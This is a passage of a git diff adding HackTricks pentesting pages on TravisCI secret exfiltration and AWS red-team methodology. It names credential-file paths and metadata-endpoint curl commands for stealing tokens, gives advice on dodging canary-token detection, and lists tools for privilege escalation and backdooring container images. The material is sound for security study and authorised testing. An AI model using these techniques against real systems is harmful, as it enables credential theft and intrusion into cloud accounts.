+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-ci-cd/todo.md b/pentesting-ci-cd/todo.md
new file mode 100644
index 0000000000..716bbecf1c
--- /dev/null
+++ b/pentesting-ci-cd/todo.md
@@ -0,0 +1,42 @@
+# TODO
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+Github PRs are welcome explaining how to (ab)use those platforms from an attacker perspective
+
+* Drone
+* TeamCity
+* BuildKite
+* OctopusDeploy
+* Rancher
+* Mesosphere
+* Radicle
+* Any other CI/CD platform...
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-ci-cd/travisci-security/README.md b/pentesting-ci-cd/travisci-security/README.md
new file mode 100644
index 0000000000..9d14e97033
--- /dev/null
+++ b/pentesting-ci-cd/travisci-security/README.md
@@ -0,0 +1,92 @@
+# TravisCI Security
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## What is TravisCI
+
+**Travis CI** is a **hosted** or on **premises** **continuous integration** service used to build and test software projects hosted on several **different git platform**.
+
+{% content-ref url="basic-travisci-information.md" %}
+[basic-travisci-information.md](basic-travisci-information.md)
+{% endcontent-ref %}
+
+## Attacks
+
+### Triggers
+
+To launch an attack you first need to know how to trigger a build. By default TravisCI will **trigger a build on pushes and pull requests**:
+
+![](<../../.gitbook/assets/image (145).png>)
+
+#### Cron Jobs
+
+If you have access to the web application you can **set crons to run the build**, this could be useful for persistence or to trigger a build:
+
+![](<../../.gitbook/assets/image (243).png>)
+
+{% hint style="info" %}
+It looks like It's not possible to set crons inside the `.travis.yml` according to [this](https://github.com/travis-ci/travis-ci/issues/9162).
+{% endhint %}
+
+### Third Party PR
+
+TravisCI by default disables sharing env variables with PRs coming from third parties, but someone might enable it and then you could create PRs to the repo and exfiltrate the secrets:
+
+![](<../../.gitbook/assets/image (208).png>)
+
+### Dumping Secrets
+
+As explained in the [**basic information**](basic-travisci-information.md) page, there are 2 types of secrets. **Environment Variables secrets** (which are listed in the web page) and **custom encrypted secrets**, which are stored inside the `.travis.yml` file as base64 (note that both as stored encrypted will end as env variables in the final machines).
+
+* To **enumerate secrets** configured as **Environment Variables** go to the **settings** of the **project** and check the list. However, note that all the project env variables set here will appear when triggering a build.
+* To enumerate the **custom encrypted secrets** the best you can do is to **check the `.travis.yml` file**.
+* To **enumerate encrypted files** you can check for **`.enc` files** in the repo, for lines similar to `openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d` in the config file, or for **encrypted iv and keys** in the **Environment Variables** such as:
+
+![](<../../.gitbook/assets/image (81).png>)
+
+### TODO:
+
+* Example build with reverse shell running on Windows/Mac/Linux
+* Example build leaking the env base64 encoded in the logs
+
+### TravisCI Enterprise
+
+If an attacker ends in an environment which uses **TravisCI enterprise** (more info about what this is in the [**basic information**](basic-travisci-information.md#travisci-enterprise)), he will be able to **trigger builds in the the Worker.** This means that an attacker will be able to move laterally to that server from which he could be able to:
+
+* escape to the host?
+* compromise kubernetes?
+* compromise other machines running in the same network?
+* compromise new cloud credentials?
+
+## References
+
+* [https://docs.travis-ci.com/user/encrypting-files/](https://docs.travis-ci.com/user/encrypting-files/)
+* [https://docs.travis-ci.com/user/best-practices-security](https://docs.travis-ci.com/user/best-practices-security)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-ci-cd/travisci-security/basic-travisci-information.md b/pentesting-ci-cd/travisci-security/basic-travisci-information.md
new file mode 100644
index 0000000000..1b24db9bd3
--- /dev/null
+++ b/pentesting-ci-cd/travisci-security/basic-travisci-information.md
@@ -0,0 +1,118 @@
+# Basic TravisCI Information
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Access
+
+TravisCI directly integrates with different git platforms such as Github, Bitbucket, Assembla, and Gitlab. It will ask the user to give TravisCI permissions to access the repos he wants to integrate with TravisCI.
+
+For example, in Github it will ask for the following permissions:
+
+* `user:email` (read-only)
+* `read:org` (read-only)
+* `repo`: Grants read and write access to code, commit statuses, collaborators, and deployment statuses for public and private repositories and organizations.
+
+## Encrypted Secrets
+
+### Environment Variables
+
+In TravisCI, as in other CI platforms, it's possible to **save at repo level secrets** that will be saved encrypted and be **decrypted and push in the environment variable** of the machine executing the build.
+
+![](<../../.gitbook/assets/image (203).png>)
+
+It's possible to indicate the **branches to which the secrets are going to be available** (by default all) and also if TravisCI **should hide its value** if it appears **in the logs** (by default it will).
+
+### Custom Encrypted Secrets
+
+For **each repo** TravisCI generates an **RSA keypair**, **keeps** the **private** one, and makes the repository’s **public key available** to those who have **access** to the repository.
+
+You can access the public key of one repo with:
+
+```
+travis pubkey -r <owner>/<repo_name>
+travis pubkey -r carlospolop/t-ci-test
+```
+
+Then, you can use this setup to **encrypt secrets and add them to your `.travis.yaml`**. The secrets will be **decrypted when the build is run** and accessible in the **environment variables**.
+
+![](<../../.gitbook/assets/image (139).png>)
+
+Note that the secrets encrypted this way won't appear listed in the environmental variables of the settings.
+
+### Custom Encrypted Files
+
+Same way as before, TravisCI also allows to **encrypt files and then decrypt them during the build**:
+
+```
+travis encrypt-file super_secret.txt -r carlospolop/t-ci-test
+
+encrypting super_secret.txt for carlospolop/t-ci-test
+storing result as super_secret.txt.enc
+storing secure env variables for decryption
+
+Please add the following to your build script (before_install stage in your .travis.yml, for instance):
+
+    openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d
+
+Pro Tip: You can add it automatically by running with --add.
+
+Make sure to add super_secret.txt.enc to the git repository.
+Make sure not to add super_secret.txt to the git repository.
+Commit all changes to your .travis.yml.
+```
+
+Note that when encrypting a file 2 Env Variables will be configured inside the repo such as:
+
+![](<../../.gitbook/assets/image (170).png>)
+
+## TravisCI Enterprise
+
+Travis CI Enterprise is an **on-prem version of Travis CI**, which you can deploy **in your infrastructure**. Think of the ‘server’ version of Travis CI. Using Travis CI allows you to enable an easy-to-use Continuous Integration/Continuous Deployment (CI/CD) system in an environment, which you can configure and secure as you want to.
+
+**Travis CI Enterprise consists of two major parts:**
+
+1. TCI **services** (or TCI Core Services), responsible for integration with version control systems, authorizing builds, scheduling build jobs, etc.
+2. TCI **Worker** and build environment images (also called OS images).
+
+**TCI Core services require the following:**
+
+1. A **PostgreSQL11** (or later) database.
+2. An infrastructure to deploy a Kubernetes cluster; it can be deployed in a server cluster or in a single machine if required
+3. Depending on your setup, you may want to deploy and configure some of the components on your own, e.g., RabbitMQ - see the [Setting up Travis CI Enterprise](https://docs.travis-ci.com/user/enterprise/tcie-3.x-setting-up-travis-ci-enterprise/) for more details.
+
+**TCI Worker requires the following:**
+
+1. An infrastructure where a docker image containing the **Worker and a linked build image can be deployed**.
+2. Connectivity to certain Travis CI Core Services components - see the [Setting Up Worker](https://docs.travis-ci.com/user/enterprise/setting-up-worker/) for more details.
+
+The amount of deployed TCI Worker and build environment OS images will determine the total concurrent capacity of Travis CI Enterprise deployment in your infrastructure.
+
+![](<../../.gitbook/assets/image (199).png>)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/README.md b/pentesting-cloud/aws-security/README.md
new file mode 100644
index 0000000000..1efc09d3b8
--- /dev/null
+++ b/pentesting-cloud/aws-security/README.md
@@ -0,0 +1,414 @@
+# AWS Pentesting
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+**Before start pentesting** an **AWS** environment there are a few **basics things you need to know** about how AWS works to help you understand what you need to do, how to find misconfigurations and how to exploit them.
+
+Concepts such as organization hierarchy, IAM and other basic concepts are explained in:
+
+{% content-ref url="aws-basic-information/" %}
+[aws-basic-information](aws-basic-information/)
+{% endcontent-ref %}
+
+## Labs to learn
+
+* [https://github.com/RhinoSecurityLabs/cloudgoat](https://github.com/RhinoSecurityLabs/cloudgoat)
+* [https://github.com/BishopFox/iam-vulnerable](https://github.com/BishopFox/iam-vulnerable)
+* [https://github.com/nccgroup/sadcloud](https://github.com/nccgroup/sadcloud)
+* [https://github.com/bridgecrewio/terragoat](https://github.com/bridgecrewio/terragoat)
+* [https://github.com/ine-labs/AWSGoat](https://github.com/ine-labs/AWSGoat)
+* [http://flaws.cloud/](http://flaws.cloud/)
+* [http://flaws2.cloud/](http://flaws2.cloud/)
+
+Tools to simulate attacks:
+
+* [https://github.com/Datadog/stratus-red-team/](https://github.com/Datadog/stratus-red-team/)
+* [https://github.com/sbasu7241/AWS-Threat-Simulation-and-Detection/tree/main](https://github.com/sbasu7241/AWS-Threat-Simulation-and-Detection/tree/main)
+
+## AWS Pentester/Red Team Methodology
+
+In order to audit an AWS environment it's very important to know: which **services are being used**, what is **being exposed**, who has **access** to what, and how are internal AWS services an **external services** connected.
+
+From a Red Team point of view, the **first step to compromise an AWS environment** is to manage to obtain some **credentials**. Here you have some ideas on how to do that:
+
+* **Leaks** in github (or similar) - OSINT
+* **Social** Engineering
+* **Password** reuse (password leaks)
+* Vulnerabilities in AWS-Hosted Applications
+  * [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) with access to metadata endpoint
+  * **Local File Read**
+    * `/home/USERNAME/.aws/credentials`
+    * `C:\Users\USERNAME\.aws\credentials`
+* 3rd parties **breached**
+* **Internal** Employee
+* [**Cognito** ](aws-services/aws-cognito-enum/#cognito)credentials
+
+Or by **compromising an unauthenticated service** exposed:
+
+{% content-ref url="aws-unauthenticated-enum-access/" %}
+[aws-unauthenticated-enum-access](aws-unauthenticated-enum-access/)
+{% endcontent-ref %}
+
+Or if you are doing a **review** you could just **ask for credentials** with these roles:
+
+{% content-ref url="aws-permissions-for-a-pentest.md" %}
+[aws-permissions-for-a-pentest.md](aws-permissions-for-a-pentest.md)
+{% endcontent-ref %}
+
+{% hint style="info" %}
+After you have managed to obtain credentials, you need to know **to who do those creds belong**, and **what they have access to**, so you need to perform some basic enumeration:
+{% endhint %}
+
+## Basic Enumeration
+
+### SSRF
+
+If you found a SSRF in a machine inside AWS check this page for tricks:
+
+{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" %}
+
+### Whoami
+
+One of the first things you need to know is who you are (in where account you are in other info about the AWS env):
+
+```bash
+# Easiest way, but might be monitored?
+aws sts get-caller-identity
+aws iam get-user # This will get your own user
+
+# If you have a Key ID
+aws sts get-access-key-info --access-key-id=ASIA1234567890123456
+
+# Get inside error message
+aws sns publish --topic-arn arn:aws:sns:us-east-1:*account id*:aaa --message aaa
+
+# From metadata
+TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
+curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/dynamic/instance-identity/document
+```
+
+{% hint style="danger" %}
+Note that companies might use **canary tokens** to identify when **tokens are being stolen and used**. It's recommended to check if a token is a canary token or not before using it.\
+For more info [**check this page**](aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md#honeytokens-bypass).
+{% endhint %}
+
+### Org Enumeration
+
+{% content-ref url="aws-services/aws-organizations-enum.md" %}
+[aws-organizations-enum.md](aws-services/aws-organizations-enum.md)
+{% endcontent-ref %}
+
+### IAM Enumeration
+
+If you have enough permissions **checking the privileges of each entity inside the AWS account** will help you understand what you and other identities can do and how to **escalate privileges**.
+
+If you don't have enough permissions to enumerate IAM, you can **steal bruteforce them** to figure them out.\
+Check **how to do the numeration and brute-forcing** in:
+
+{% content-ref url="aws-services/aws-iam-enum.md" %}
+[aws-iam-enum.md](aws-services/aws-iam-enum.md)
+{% endcontent-ref %}
+
+{% hint style="info" %}
+Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\
+In the following section you can check some ways to **enumerate some common services.**
+{% endhint %}
+
+## Services Enumeration, Post-Exploitation & Persistence
+
+AWS has an astonishing amount of services, in the following page you will find **basic information, enumeration** cheatsheets\*\*,\*\* how to **avoid detection**, obtain **persistence**, and other **post-exploitation** tricks about some of them:
+
+{% content-ref url="aws-services/" %}
+[aws-services](aws-services/)
+{% endcontent-ref %}
+
+Note that you **don't** need to perform all the work **manually**, below in this post you can find a **section about** [**automatic tools**](./#automated-tools).
+
+Moreover, in this stage you might discovered **more services exposed to unauthenticated users,** you might be able to exploit them:
+
+{% content-ref url="aws-unauthenticated-enum-access/" %}
+[aws-unauthenticated-enum-access](aws-unauthenticated-enum-access/)
+{% endcontent-ref %}
+
+## Privilege Escalation
+
+If you can **check at least your own permissions** over different resources you could **check if you are able to obtain further permissions**. You should focus at least in the permissions indicated in:
+
+{% content-ref url="aws-privilege-escalation/" %}
+[aws-privilege-escalation](aws-privilege-escalation/)
+{% endcontent-ref %}
+
+## Publicly Exposed Services
+
+While enumerating AWS services you might have found some of them **exposing elements to the Internet** (VM/Containers ports, databases or queue services, snapshots or buckets...).\
+As pentester/red teamer you should always check if you can find **sensitive information / vulnerabilities** on them as they might provide you **further access into the AWS account**.
+
+In this book you should find **information** about how to find **exposed AWS services and how to check them**. About how to find **vulnerabilities in exposed network services** I would recommend you to **search** for the specific **service** in:
+
+{% embed url="https://book.hacktricks.xyz/" %}
+
+## Compromising the Organization
+
+### From the root/management account
+
+When the management account creates new accounts in the organization, a **new role** is created in the new account, by default named **`OrganizationAccountAccessRole`** and giving **AdministratorAccess** policy to the **management account** to access the new account.
+
+<figure><img src="../../.gitbook/assets/image (171).png" alt=""><figcaption></figcaption></figure>
+
+So, in order to access as administrator a child account you need:
+
+* **Compromise** the **management** account and find the **ID** of the **children accounts** and the **names** of the **role** (OrganizationAccountAccessRole by default) allowing the management account to access as admin.
+  * To find children accounts go to the organizations section in the aws console or run `aws organizations list-accounts`
+  * You cannot find the name of the roles directly, so check all the custom IAM policies and search any allowing **`sts:AssumeRole` over the previously discovered children accounts**.
+* **Compromise** a **principal** in the management account with **`sts:AssumeRole` permission over the role in the children accounts** (even if the account is allowing anyone from the management account to impersonate, as its an external account, specific `sts:AssumeRole` permissions are necessary).
+
+## Automated Tools
+
+### Recon
+
+* [**aws-recon**](https://github.com/darkbitio/aws-recon): A multi-threaded AWS security-focused **inventory collection tool** written in Ruby.
+
+```bash
+# Install
+gem install aws_recon
+
+# Recon and get json
+AWS_PROFILE=<profile> aws_recon \
+  --services S3,EC2 \
+  --regions global,us-east-1,us-east-2 \
+  --verbose
+```
+
+* [**cloudlist**](https://github.com/projectdiscovery/cloudlist): Cloudlist is a **multi-cloud tool for getting Assets** (Hostnames, IP Addresses) from Cloud Providers.
+* [**cloudmapper**](https://github.com/duo-labs/cloudmapper): CloudMapper helps you analyze your Amazon Web Services (AWS) environments. It now contains much more functionality, including auditing for security issues.
+
+```bash
+# Installation steps in github
+# Create a config.json file with the aws info, like:
+{
+    "accounts": [
+        {
+            "default": true,
+            "id": "<account id>",
+            "name": "dev"
+        }
+    ],
+    "cidrs":
+    {
+        "2.2.2.2/28": {"name": "NY Office"}
+    }
+}
+
+# Enumerate
+python3 cloudmapper.py collect --profile dev
+## Number of resources discovered
+python3 cloudmapper.py stats --accounts dev
+
+# Create HTML report
+## In the report you will find all the info already
+python3 cloudmapper.py report --accounts dev
+
+# Identify potential issues 
+python3 cloudmapper.py audit --accounts dev --json > audit.json
+python3 cloudmapper.py audit --accounts dev --markdow > audit.md
+python3 cloudmapper.py iam_report --accounts dev
+
+# Identify admins
+## The permissions search for are in https://github.com/duo-labs/cloudmapper/blob/4df9fd7303e0337ff16a08f5e58f1d46047c4a87/shared/iam_audit.py#L163-L175
+python3 cloudmapper.py find_admins --accounts dev
+
+# Identify unused elements
+python3 cloudmapper.py find_unused --accounts dev
+
+# Identify publivly exposed resources
+python3 cloudmapper.py public --accounts dev
+
+python cloudmapper.py prepare #Prepare webserver
+python cloudmapper.py webserver #Show webserver
+```
+
+* [**cartography**](https://github.com/lyft/cartography): Cartography is a Python tool that consolidates infrastructure assets and the relationships between them in an intuitive graph view powered by a Neo4j database.
+
+```bash
+# Install
+pip install cartography
+## At the time of this writting you need neo4j version 3.5.*
+
+# Get AWS info
+AWS_PROFILE=dev cartography --neo4j-uri bolt://127.0.0.1:7687 --neo4j-password-prompt  --neo4j-user neo4j
+```
+
+* [**starbase**](https://github.com/JupiterOne/starbase): Starbase collects assets and relationships from services and systems including cloud infrastructure, SaaS applications, security controls, and more into an intuitive graph view backed by the Neo4j database.
+* [**aws-inventory**](https://github.com/nccgroup/aws-inventory): (Uses python2) This is a tool that tries to **discover all** [**AWS resources**](https://docs.aws.amazon.com/general/latest/gr/glos-chap.html#resource) created in an account.
+* [**aws\_public\_ips**](https://github.com/arkadiyt/aws_public_ips): It's a tool to **fetch all public IP addresses** (both IPv4/IPv6) associated with an AWS account.
+
+### Privesc & Exploiting
+
+* [**SkyArk**](https://github.com/cyberark/SkyArk)**:** Discover the most privileged users in the scanned AWS environment, including the AWS Shadow Admins. It uses powershell. You can find the **definition of privileged policies** in the function **`Check-PrivilegedPolicy`** in [https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1](https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1).
+* [**pacu**](https://github.com/RhinoSecurityLabs/pacu): Pacu is an open-source **AWS exploitation framework**, designed for offensive security testing against cloud environments. It can **enumerate**, find **miss-configurations** and **exploit** them. You can find the **definition of privileged permissions** in [https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam\_\_privesc\_scan/main.py#L134](https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134) inside the **`user_escalation_methods`** dict.
+  * Note that pacu **only checks your own privescs paths** (not account wide).
+
+```bash
+# Install
+## Feel free to use venvs
+pip3 install pacu
+
+# Use pacu CLI
+pacu
+> import_keys <profile_name> # import 1 profile from .aws/credentials
+> import_keys --all # import all profiles
+> list # list modules
+> exec iam__enum_permissions # Get permissions
+> exec iam__privesc_scan # List privileged permissions
+```
+
+* [**PMapper**](https://github.com/nccgroup/PMapper): Principal Mapper (PMapper) is a script and library for identifying risks in the configuration of AWS Identity and Access Management (IAM) for an AWS account or an AWS organization. It models the different IAM Users and Roles in an account as a directed graph, which enables checks for **privilege escalation** and for alternate paths an attacker could take to gain access to a resource or action in AWS. You can check the **permissions used to find privesc** paths in the filenames ended in `_edges.py` in [https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing](https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing)
+
+```bash
+# Install
+pip install principalmapper
+
+# Get data
+pmapper --profile dev graph create
+pmapper --profile dev graph display # Show basic info
+# Generate graph
+pmapper --profile dev visualize # Generate svg graph file (can also be png, dot and graphml)
+pmapper --profile dev visualize --only-privesc # Only privesc permissions
+
+# Generate analysis
+pmapper --profile dev analysis
+## Run queries
+pmapper --profile dev query 'who can do iam:CreateUser'
+pmapper --profile dev query 'preset privesc *' # Get privescs with admins
+
+# Get organization hierarchy data
+pmapper --profile dev orgs create
+pmapper --profile dev orgs display
+```
+
+* [**cloudsplaining**](https://github.com/salesforce/cloudsplaining): Cloudsplaining is an AWS IAM Security Assessment tool that identifies violations of least privilege and generates a risk-prioritized HTML report.\
+  It will show you potentially **over privileged** customer, inline and aws **policies** and which **principals has access to them**. (It not only checks for privesc but also other kind of interesting permissions, recommended to use).
+
+```bash
+# Install
+pip install cloudsplaining
+
+# Download IAM policies to check
+## Only the ones attached with the versions used
+cloudsplaining download --profile dev
+
+# Analyze the IAM policies
+cloudsplaining scan --input-file /private/tmp/cloudsplaining/dev.json --output /tmp/files/
+```
+
+* [**cloudjack**](https://github.com/prevade/cloudjack): CloudJack assesses AWS accounts for **subdomain hijacking vulnerabilities** as a result of decoupled Route53 and CloudFront configurations.
+* [**ccat**](https://github.com/RhinoSecurityLabs/ccat): List ECR repos -> Pull ECR repo -> Backdoor it -> Push backdoored image
+* [**Dufflebag**](https://github.com/bishopfox/dufflebag): Dufflebag is a tool that **searches** through public Elastic Block Storage (**EBS) snapshots for secrets** that may have been accidentally left in.
+
+### Audit
+
+* [**cloudsploit**](https://github.com/aquasecurity/cloudsploit)**:** CloudSploit by Aqua is an open-source project designed to allow detection of **security risks in cloud infrastructure** accounts, including: Amazon Web Services (AWS), Microsoft Azure, Google Cloud Platform (GCP), Oracle Cloud Infrastructure (OCI), and GitHub (It doesn't look for ShadowAdmins).
+
+```bash
+./index.js --csv=file.csv --console=table --config ./config.js
+
+# Compiance options: --compliance {hipaa,cis,cis1,cis2,pci}
+## use "cis" for cis level 1 and 2
+```
+
+* [**Prowler**](https://github.com/prowler-cloud/prowler): Prowler is an Open Source security tool to perform AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness.
+
+```bash
+# Install python3, jq and git
+# Install
+pip install prowler
+prowler -v
+
+# Run
+prowler <provider>
+prowler aws --profile custom-profile [-M csv json json-asff html]
+```
+
+* [**CloudFox**](https://github.com/BishopFox/cloudfox): CloudFox helps you gain situational awareness in unfamiliar cloud environments. It’s an open source command line tool created to help penetration testers and other offensive security professionals find exploitable attack paths in cloud infrastructure.
+
+```bash
+cloudfox aws --profile [profile-name] all-checks
+```
+
+* [**ScoutSuite**](https://github.com/nccgroup/ScoutSuite): Scout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments.
+
+```bash
+# Install
+virtualenv -p python3 venv
+source venv/bin/activate
+pip install scoutsuite
+scout --help
+
+# Get info
+scout aws -p dev
+```
+
+* [**cs-suite**](https://github.com/SecurityFTW/cs-suite): Cloud Security Suite (uses python2.7 and looks unmaintained)
+* [**Zeus**](https://github.com/DenizParlak/Zeus): Zeus is a powerful tool for AWS EC2 / S3 / CloudTrail / CloudWatch / KMS best hardening practices (looks unmaintained). It checks only default configured creds inside the system.
+
+### Constant Audit
+
